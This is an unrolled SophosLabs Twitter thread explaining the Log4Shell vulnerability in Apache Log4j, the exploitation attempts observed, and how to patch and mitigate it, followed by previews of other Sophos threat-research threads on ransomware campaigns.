#Log4Shell Hell: anatomy of an exploit outbreak

A vulnerability in a widely-used Java logging component is exposing untold numbers of organizations to potential remote code attacks and information exposure...

1/16
On December 9, a severe remote code vulnerability was revealed in Apache’s Log4J , a very common logging system used by developers of web and server applications based on Java and other programming languages. 2/16
The vulnerability affects a broad range of services and applications on servers, making it extremely dangerous—and the latest updates for those server applications urgent. 3/16
The vulnerability makes it possible for any attacker who can inject text into log messages or log message parameters into server logs that load code from a remote server; The targeted server then executes that code via calls to the Java Naming and Directory Interface (JNDI). 4/16
JNDI interfaces with a number of network services, including the Lightweight Directory Access Protocol (LDAP), Domain Name Service (DNS), Java’s Remote Interface (RMI), and the Common Object Request Broker (CORBA). 5/16
@Sophos has seen efforts to exploit LDAP, DNS and RMI, using a URL tagged to those services redirected to an external server.

Sophos is already detecting malicious cryptominer operations attempting to leverage the vulnerability, and... 6/16
...there are credible reports from other sources that several automated botnets (such as Mirai, Tsunami, and Kinsing) have begun to exploit it as well. Other types of attacks – and payloads – are likely to rapidly follow. 7/16
While there are steps server operators can take to mitigate the vulnerability, the best fix is to upgrade to the patched version (Log4j 2.15.0.) But, rolling out an upgrade may not be that simple—especially if organizations don’t know where it’s been deployed as a component. 8/16
Similar critical JNDI injection vulnerabilities have been found in other Java server components in the past, including one in the Internet Inter-ORB Protocol (IIOP) implementation of Oracle’s WebLogic Server (CVE-2020-2551). 9/16
The widespread use of Log4J in commercial and open-source software connected to the Internet—web and mobile application servers, email servers (including Apache’s Java-based JAMES email server), and cloud services—makes this a difficult vulnerability to track down & patch. 10/16
Sophos has already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability, and log searches by other organizations (including Cloudflare) suggest the vulnerability may have been openly exploited for weeks. 11/16
The instances detected by Sophos have been mostly scans for the vulnerability, exploit tests, and attempts to install coin miners.

We have also seen attempts to extract information from services, including Amazon Web Services keys and other private data. 12/16
👉 Detection and correction

Resolving the Log4J vulnerability requires defense in depth. Organizations should deploy rules to block exploit traffic from all internet-facing services (Sophos IPS currently blocks traffic matching known Log4J exploit signatures). 13/16
Long-term protection will require identifying and updating instances of Log4J or mitigating the issue by changing settings in Log4J... 14/16
... (either through XML or YAML configuration files in the root of Log4J’s path settings, or programmatically). That may require code changes in products where Log4J is embedded. 15/16
SophosLabs would like to acknowledge the contributions of Fraser Howard, Hardik Shah, @GaborSzappanos, and Mukesh Kumar for their contributions to this report.

See all the details from @thepacketrat...

news.sophos.com/en-us/2021/12/…

16/16

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with SophosLabs

SophosLabs Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @SophosLabs

18 Nov
NEW ransomware actor uses password-protected archives to bypass encryption protection

Calling themselves "Memento team", actors use Python-based ransomware that they reconfigured after setbacks...

1/13
In late October, Sophos MTR’s Rapid Response Team encountered a new ransomware group with an interesting approach to holding victims’ files hostage.

The ransomware used by this group, who identify themselves as “Memento Team,” doesn’t encrypt files. 2/13
Instead, it copies files into password-protected archives, using a renamed freeware version of the legitimate file utility WinRAR—and then encrypts the password and deletes the original files. 3/13
Read 13 tweets
4 Nov
Hey everyone. @threatresearch here with a little news about how my day's been going.

Seems a lot of people are dealing with an outbreak of #BazarBackdoor that starts with an email that sounds like it's coming from someone who is annoyed you didn't report a complaint about you.
We received a LOT of samples of the same-looking email from people who, correctly, recognized this as a phishy-looking spam. The "complaint" was purportedly linked in the email to a PDF.

Narrator: It wasn't a PDF
Rather, the link leads to one of several pages hosted in Microsoft's cloud hosting space. The pages all looked like this one, with a link to download the "Preview PDF" but if you look closer at the link, you'll see it's an "ms-appinstaller:" link. That's new!
Read 17 tweets
3 Sep
NEW: Conti affiliates use ProxyShell Exchange exploit in ransomware attacks ⚠️

In one of the ProxyShell-based attacks observed by Sophos, the Conti affiliates managed to gain access to the target’s network and set up a remote web shell in under a minute...

1/14
ProxyShell represents an evolution of the ProxyLogon attack method. In recent months, the exploit has become a mainstay of ransomware attacker playbooks, including those deploying the new LockFile ransomware first seen in July. 2/14
As attackers have gained experience with the techniques, their dwell time before launching the final ransomware payload on target networks has decreased from weeks to days to hours. 3/14
Read 14 tweets
1 Sep
NEW: Fake pirated software sites serve up malware droppers as a service 🏴‍☠️

During our recent investigation into an ongoing Raccoon Stealer campaign, we found the malware was being distributed by a network of websites acting as a “dropper as a service,”... 1/00 Image
... serving up a variety of other malware packages—often bundling multiple unrelated malware together in a single dropper. These malware included an assortment of clickfraud bots, other information stealers, and even ransomware. 2/00 Image
While the Raccoon Stealer campaign we tracked on these sites took place between January and April, 2021, we continue to see malware and other malicious content distributed through the same network of sites. 3/00 Image
Read 13 tweets
9 Aug
NEW 👇

BlackMatter ransomware emerges from the shadow of DarkSide

1/12
In late July, a new RaaS appeared on the scene.

Calling itself BlackMatter, the ransomware claims to fill the void left by DarkSide and REvil – adopting the best tools and techniques from each of them, as well as from the still-active LockBit 2.0. 2/12
We decided to take a closer look at the malware and the claims being made by the new adversary to see what’s really going on... 3/12
Read 12 tweets
11 Jun
NEW insights ☠️

Relentless REvil, revealed: RaaS as variable as the criminals who use it

No two criminal groups deploy the ransomware-as-a-service (RaaS), also known as Sodinokibi, in exactly the same way...

(a thread) 1/11
As attacks involving RaaS malware, including REvil, increasingly have generated attention, we wanted to pull together a common body of our knowledge about the ransomware itself, and the variety we observe in attack methods employed by the criminals who lease the software. 2/11
We've also reviewed reports from Sophos Rapid Response about attacks involving Sodinokibi/REvil where the MTR team were hired to provide incident response and cleanup. From these detailed analyses, we were able to develop a picture of a common malware being deployed. 3/11
Read 11 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(